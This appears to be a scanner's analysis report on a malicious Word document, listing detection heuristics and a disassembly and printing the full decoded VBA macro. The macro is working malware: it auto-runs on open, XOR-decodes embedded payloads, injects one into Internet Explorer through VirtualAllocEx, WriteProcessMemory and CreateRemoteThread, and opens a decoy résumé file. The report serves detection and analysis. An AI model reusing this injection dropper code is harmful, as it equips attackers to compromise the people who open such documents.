MALICIOUS
508
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.005 Visual Basic
The sample exhibits critical heuristic firings for CVE-2007-3899, indicating exploitation of a Microsoft Word memory corruption vulnerability. The presence of VBA macros, specifically AutoOpen and Workbook_Open, along with calls to CreateProcess, VirtualAlloc, WriteProcessMemory, and CreateRemoteThread, strongly suggests the execution of injected code. The XOR-encoded strings further indicate obfuscation techniques commonly used by malware.
Heuristics 16
-
CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
-
OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
-
ClamAV: Doc.Macro.Injection-6355574-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Injection-6355574-0
-
Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORYReference to WriteProcessMemory API
-
Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREADReference to CreateRemoteThread API
-
XOR-encoded strings (key 0x5A) critical SC_XOR_ENCODEDFound 1 Windows library/API name(s) XOR-encoded with single-byte key 0x5A: 'ADVAPI32.DLL'
Disassembly
Attempted x86 opcode disassembly00053A35 1b1e sbb ebx, dword ptr [esi] 00053A37 0c1b or al, 0x1b 00053A39 0a13 or dl, byte ptr [ebx] 00053A3B 6968741e16165a imul ebp, dword ptr [eax + 0x74], 0x5a16161e 00053A42 5a pop edx 00053A43 5a pop edx 00053A44 5a pop edx 00053A45 3939 cmp dword ptr [ecx], edi 00053A47 295a0f sub dword ptr [edx + 0xf], ebx 00053A4A 0e push cs 00053A4B 1c77 sbb al, 0x77 00053A4D 625a5a bound ebx, qword ptr [edx + 0x5a] 00053A50 5a pop edx 00053A51 0f0e femms 00053A53 1c77 sbb al, 0x77 00053A55 6b6c161f5a imul ebp, dword ptr [esi + edx + 0x1f], 0x5a 00053A5A 5a pop edx 00053A5B 5a pop edx 00053A5C 5a pop edx 00053A5D 0f1413 unpcklps xmm2, xmmword ptr [ebx] 00053A60 19151e1f5a1d sbb dword ptr [0x1d5a1f1e], edx 00053A66 3f aas 00053A67 2e0a28 or ch, byte ptr cs:[eax] 00053A6A 35393f2929 xor eax, 0x29293f39 00053A6F 0d33343e35 or eax, 0x353e3433 00053A74 2d092e3b2e sub eax, 0x2e3b2e09 00053A79 3335345a1d3f xor esi, dword ptr [0x3f1d5a34] 00053A7F 2e0f293f movaps xmmword ptr cs:[edi], xmm7 00053A83 281538303f39 sub byte ptr [0x393f3038], dl 00053A89 2e13343c adc esi, dword ptr cs:[esp + edi] 00053A8D 3528373b2e xor eax, 0x2e3b3728 00053A92 33 .byte 0x33 00053A93 35 .byte 0x35 00053A94 34 .byte 0x34
-
Reference to CreateProcess API high SC_STR_CREATEPROCESSReference to CreateProcess API
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim wvghsQfShk Set wvghsQfShk = CreateObject("ADODB.Stream") wvghsQfShk.Type = UkCeYErodm -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() hKpmtdwfbcVf -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
End Sub Sub Workbook_Open() hKpmtdwfbcVf -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
If Len(Environ("ProgramW6432")) > 0 Then MDOyCzztxUrq = Environ("PROGRAMFILES(X86)") & "\internet explorer\iexplore.exe" -
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9311 bytes |
SHA-256: 587c426db7189503e4ab9cced21d8f6620be462cf127b8671aabe87347d3ddc5 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
85 of 149 identifiers look randomly generated (e.g. 'dtUbCrqDObPvicG') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const UkCeYErodm = 1
Const YFgeuyuYOq = 1, yENVLiDmOw = 2, GgKdJHhbKy = 8
Private Type sRBvucEtdXym
DCAxJpegGSqO As Long
SoAPFyfaUtau As Long
mlOOvdnudbhm As Long
mzqTxeHBQYhb As Long
End Type
Private Type pahHkgGUkaHd
TmwZClrhEJpP As Long
XeiQukksbzWK As String
oiYzPGzZzSbi As String
YAsZdlaJIacm As String
FDMPWIeeaDUb As Long
WmROJrbGYVGQ As Long
XufAvYUPRnmU As Long
ARqHAUkYYXlS As Long
CdvuXeDoJeDG As Long
MzDsaDIrrkqI As Long
TfpYViOHyTNo As Long
sQKJAwbrptVl As Long
VOSBtOkJEUSs As Integer
WcVMHooiSmrR As Integer
YXodNLJHRaio As Long
HFaRXngmEHWs As Long
KgUxVoSeQjMy As Long
uGAtnjfMJXYM As Long
End Type
#If VBA7 Then
Private Declare PtrSafe Function vYRRaPjKJcct Lib "kernel32" Alias "CreateRemoteThread" (ByVal DCAxJpegGSqO As Long, ByVal KlCGDQLHnEFf As Long, ByVal vBmxSvzOKqQL As Long, ByVal vUJelPEeCJAw As LongPtr, DoRoxgPDXTQc As Long, ByVal ktMZudZfnqcy As Long, VjsOskExXqJU As Long) As LongPtr
Private Declare PtrSafe Function weMFAEEALOZs Lib "kernel32" Alias "VirtualAllocEx" (ByVal DCAxJpegGSqO As Long, ByVal rcPibAKGWPiv As Long, ByVal olYYRLaAcAxA As Long, ByVal PdhuJAzhZsqO As Long, ByVal osUYHPNtExGR As Long) As LongPtr
Private Declare PtrSafe Function jspvaDVaZVXp Lib "kernel32" Alias "WriteProcessMemory" (ByVal DCAxJpegGSqO As Long, ByVal gdaYUIRWpXmw As LongPtr, ByRef zXWCLLTTeTpN As Any, ByVal cSrSAauGoQkL As Long, ByVal toaRriPmxoVv As LongPtr) As LongPtr
Private Declare PtrSafe Function UueEbsZDAyRM Lib "kernel32" Alias "CreateProcessA" (ByVal kPBNwVgBOBbZ As String, ByVal DNuZSfCPsmWn As String, BSHcdYIDDQGa As Any, KlCGDQLHnEFf As Any, ByVal ZbNcIOBIaDxo As Long, ByVal ktMZudZfnqcy As Long, DDKtJlRVKPCk As Any, ByVal KyFIKwEtxLQd As String, WsdDSUOgFbIj As pahHkgGUkaHd, zJRAtIMNtCRN As sRBvucEtdXym) As Long
#Else
Private Declare Function vYRRaPjKJcct Lib "kernel32" Alias "CreateRemoteThread" (ByVal DCAxJpegGSqO As Long, ByVal KlCGDQLHnEFf As Long, ByVal vBmxSvzOKqQL As Long, ByVal vUJelPEeCJAw As Long, DoRoxgPDXTQc As Long, ByVal ktMZudZfnqcy As Long, VjsOskExXqJU As Long) As Long
Private Declare Function weMFAEEALOZs Lib "kernel32" Alias "VirtualAllocEx" (ByVal DCAxJpegGSqO As Long, ByVal rcPibAKGWPiv As Long, ByVal olYYRLaAcAxA As Long, ByVal PdhuJAzhZsqO As Long, ByVal osUYHPNtExGR As Long) As Long
Private Declare Function jspvaDVaZVXp Lib "kernel32" Alias "WriteProcessMemory" (ByVal DCAxJpegGSqO As Long, ByVal gdaYUIRWpXmw As Long, ByRef zXWCLLTTeTpN As Any, ByVal cSrSAauGoQkL As Long, ByVal toaRriPmxoVv As Long) As Long
Private Declare Function UueEbsZDAyRM Lib "kernel32" Alias "CreateProcessA" (ByVal kPBNwVgBOBbZ As String, ByVal DNuZSfCPsmWn As String, BSHcdYIDDQGa As Any, KlCGDQLHnEFf As Any, ByVal ZbNcIOBIaDxo As Long, ByVal ktMZudZfnqcy As Long, DDKtJlRVKPCk As Any, ByVal lpCurrentDriectory As String, WsdDSUOgFbIj As pahHkgGUkaHd, zJRAtIMNtCRN As sRBvucEtdXym) As Long
#End If
Sub hKpmtdwfbcVf()
Dim AvbfMfOlMFUK As Long, CrnrWEgIYXnR As Variant, aybCpsxMPOMS As Long
Dim eYJMjndWliMH As sRBvucEtdXym
Dim NDRydauLrGFq As pahHkgGUkaHd
Dim mixcHUtJfDZv As String
Dim MDOyCzztxUrq As String
Dim AjBvdifzXQ As String
Dim RTiRHpQQIX() As Byte
Dim hHPJyGviet As Boolean
#If VBA7 Then
Dim DiaisoMVOzOL As LongPtr, lYlWHXgjcPLq As LongPtr
#Else
Dim DiaisoMVOzOL As Long, lYlWHXgjcPLq As Long
#End If
CrnrWEgIYXnR = vbhibywu
If Len(Environ("ProgramW6432")) > 0 Then
MDOyCzztxUrq = Environ("PROGRAMFILES(X86)") & "\internet explorer\iexplore.exe"
Else
MDOyCzztxUrq = Environ("PROGRAMFILES") & "\internet explorer\iexplore.exe"
End If
lYlWHXgjcPLq = UueEbsZDAyRM(mixcHUtJfDZv, MDOyCzztxUrq, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, mixcHUtJfDZv, NDRydauLrGFq, eYJMjndWliMH)
DiaisoMVOzOL = weMFAEEALOZs(eYJMjndWliMH.DCAxJpegGSqO, 0, UBound(CrnrWEgIYXnR), &H1000, &H40)
For aybCpsxMPOMS = LBound(CrnrWEgIYXnR) To UBound(CrnrWEgIYXnR)
AvbfMfOlMFUK = CrnrWEgIYXnR(aybCpsxMPOMS)
lYlWHXgjcPLq = jspvaDVaZVXp(eYJMjndWliMH.DCAxJpegGSqO, DiaisoMVOzOL + aybCpsxMPOMS, AvbfMfOlMFUK, 1, ByVal 0&)
Next aybCpsxMPOMS
lYlWHXgjcPLq = vYRRaPjKJcct(eYJMjndWliMH.DCAxJpegGSqO, 0, 0, DiaisoMVOzOL, 0, 0, 0)
AjBvdifzXQ = Environ("TEMP") & "\Candidate-Resume-2019.doc"
RTiRHpQQIX = wdablndx
hHPJyGviet = TnmOqfNvca(AjBvdifzXQ, RTiRHpQQIX)
Set temp = ActiveDocument
Documents.Open (AjBvdifzXQ)
temp.Close SaveChanges:=wdDoNotSaveChanges
End Sub
Function TnmOqfNvca(nMhfWtYRnw, uffNizKKSN)
Dim wvghsQfShk
Set wvghsQfShk = CreateObject("ADODB.Stream")
wvghsQfShk.Type = UkCeYErodm
wvghsQfShk.Open
wvghsQfShk.Write uffNizKKSN
wvghsQfShk.SaveToFile nMhfWtYRnw, yENVLiDmOw
End Function
Sub AutoOpen()
hKpmtdwfbcVf
End Sub
Sub Workbook_Open()
hKpmtdwfbcVf
End Sub
Function vbhibywu() As Byte()
Dim FHwuMmFxNTAMpys() As Byte
Dim rjRyGoggFXixUjV As Long
Dim dtUbCrqDObPvicG(7) As Byte
Dim aybCpsxMPOMS As Long
Dim iFmMPheuhFDGdlH() As Byte
Dim hHPJyGviet As Boolean
FHwuMmFxNTAMpys = UEpQaymsbv(ActiveDocument.FullName)
rjRyGoggFXixUjV = UWJEcrrGZt(FHwuMmFxNTAMpys)
dtUbCrqDObPvicG(0) = 57
dtUbCrqDObPvicG(1) = 78
dtUbCrqDObPvicG(2) = 82
dtUbCrqDObPvicG(3) = 67
dtUbCrqDObPvicG(4) = 74
dtUbCrqDObPvicG(5) = 89
dtUbCrqDObPvicG(6) = 84
dtUbCrqDObPvicG(7) = 89
aybCpsxMPOMS = jtGHjgeTHO(FHwuMmFxNTAMpys, dtUbCrqDObPvicG)
iFmMPheuhFDGdlH = LrnUaWJVtv(FHwuMmFxNTAMpys, aybCpsxMPOMS + UWJEcrrGZt(dtUbCrqDObPvicG), 212481 - 1)
hHPJyGviet = dPYqsoWost(iFmMPheuhFDGdlH, UWJEcrrGZt(iFmMPheuhFDGdlH))
vbhibywu = iFmMPheuhFDGdlH
End Function
Function wdablndx() As Byte()
Dim FHwuMmFxNTAMpys() As Byte
Dim rjRyGoggFXixUjV As Long
Dim dtUbCrqDObPvicG(7) As Byte
Dim aybCpsxMPOMS As Long
Dim iFmMPheuhFDGdlH() As Byte
Dim hHPJyGviet As Boolean
FHwuMmFxNTAMpys = UEpQaymsbv(ActiveDocument.FullName)
rjRyGoggFXixUjV = UWJEcrrGZt(FHwuMmFxNTAMpys)
dtUbCrqDObPvicG(0) = 55
dtUbCrqDObPvicG(1) = 74
dtUbCrqDObPvicG(2) = 65
dtUbCrqDObPvicG(3) = 71
dtUbCrqDObPvicG(4) = 82
dtUbCrqDObPvicG(5) = 56
dtUbCrqDObPvicG(6) = 79
dtUbCrqDObPvicG(7) = 68
aybCpsxMPOMS = jtGHjgeTHO(FHwuMmFxNTAMpys, dtUbCrqDObPvicG)
iFmMPheuhFDGdlH = LrnUaWJVtv(FHwuMmFxNTAMpys, aybCpsxMPOMS + UWJEcrrGZt(dtUbCrqDObPvicG), 93184 - 1)
hHPJyGviet = dPYqsoWost(iFmMPheuhFDGdlH, UWJEcrrGZt(iFmMPheuhFDGdlH))
wdablndx = iFmMPheuhFDGdlH
End Function
Function UWJEcrrGZt(abArray() As Byte) As Long
Dim nLen As Long
UWJEcrrGZt = UBound(abArray) - LBound(abArray) + 1
End Function
Function UEpQaymsbv(ayPYliBNVT As String)
Dim zJxZXxCHca() As Byte
Dim ptYMxfMkoa As Integer: ptYMxfMkoa = FreeFile
Open ayPYliBNVT For Binary Access Read As #ptYMxfMkoa
ReDim zJxZXxCHca(0 To LOF(ptYMxfMkoa) - 1)
Get #ptYMxfMkoa, , zJxZXxCHca
Close #ptYMxfMkoa
UEpQaymsbv = zJxZXxCHca
End Function
Function jtGHjgeTHO(pfvlQrqety() As Byte, nBuYVYWNNO() As Byte) As Long
Dim zyabobJmqN As Boolean
Dim uBgkizOBng As Long
Dim LWnVcvGgUK As Long
Dim tQNVJeQqRk As Long
Dim kxKDAWkaFs As Long
zyabobJmqN = False
tQNVJeQqRk = UWJEcrrGZt(pfvlQrqety)
kxKDAWkaFs = UWJEcrrGZt(nBuYVYWNNO)
For uBgkizOBng = 0 To tQNVJeQqRk
zyabobJmqN = True
For LWnVcvGgUK = 0 To kxKDAWkaFs - 1
If pfvlQrqety(uBgkizOBng + LWnVcvGgUK) <> nBuYVYWNNO(LWnVcvGgUK) Then
zyabobJmqN = False
Exit For
End If
Next LWnVcvGgUK
If zyabobJmqN = True Then
Exit For
End If
Next uBgkizOBng
If zyabobJmqN = False Then
jtGHjgeTHO = -1
Else
jtGHjgeTHO = uBgkizOBng
End If
End Function
Function LrnUaWJVtv(pfvlQrqety() As Byte, xMZyrXvMCa As Long, eIbEiKWFpb As Long) As Byte()
Dim jHrsfbohVM() As Byte
Dim uBgkizOBng As Long
For uBgkizOBng = 0 To eIbEiKWFpb
ReDim Preserve jHrsfbohVM(uBgkizOBng)
jHrsfbohVM(uBgkizOBng) = pfvlQrqety(xMZyrXvMCa + uBgkizOBng)
Next uBgkizOBng
LrnUaWJVtv = jHrsfbohVM
End Function
Function dPYqsoWost(aLroiYYqoh() As Byte, eIbEiKWFpb As Long)
Dim MdvQvXHAeI As Byte
Dim mLwgcnLowc As Long
MdvQvXHAeI = 90
For mLwgcnLowc = 0 To eIbEiKWFpb - 1
aLroiYYqoh(mLwgcnLowc) = aLroiYYqoh(mLwgcnLowc) Xor MdvQvXHAeI
Next mLwgcnLowc
End Function
|
|||
ole10native_00.bin |
ole-package | OLE Ole10Native stream: ObjectPool/_1612090647/Ole10Native | 212955 bytes |
SHA-256: bdb813ee80f9f95855db02e810e4e51d75009a7b4e76d641f2e2f93bf7707166 |
|||
ole10native_01.bin |
ole-package | OLE Ole10Native stream: ObjectPool/_1612090648/Ole10Native | 93658 bytes |
SHA-256: c94978050593ac6cced76ff449533df0c13a2dd7ecdfee9e6796561f584b54ec |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.